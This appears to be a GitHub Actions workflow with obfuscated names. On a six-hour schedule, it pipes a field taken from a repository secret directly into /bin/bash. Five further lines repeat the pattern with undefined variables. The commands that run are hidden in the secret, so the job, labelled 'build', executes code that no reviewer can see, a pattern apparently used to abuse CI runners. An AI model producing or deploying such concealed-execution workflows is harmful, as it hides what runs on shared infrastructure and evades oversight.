name: haizhinuo7613

on:
  workflow_dispatch:
  schedule:
    - cron: '18 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: haizhinuo7613
        env:
          go6: ${{ secrets.go6 }}
        run: |
          echo $go6 | jq -r .lgi48 | /bin/bash
          echo $nsat66 | jq -r .nyd756 | /bin/bash
          echo $tumt611 | jq -r .xdsi1837 | /bin/bash
          echo $j659 | jq -r .raqu60396 | /bin/bash
          echo $a87452 | jq -r .ayo34 | /bin/bash
          echo $pw597 | jq -r .sdc97903 | /bin/bash

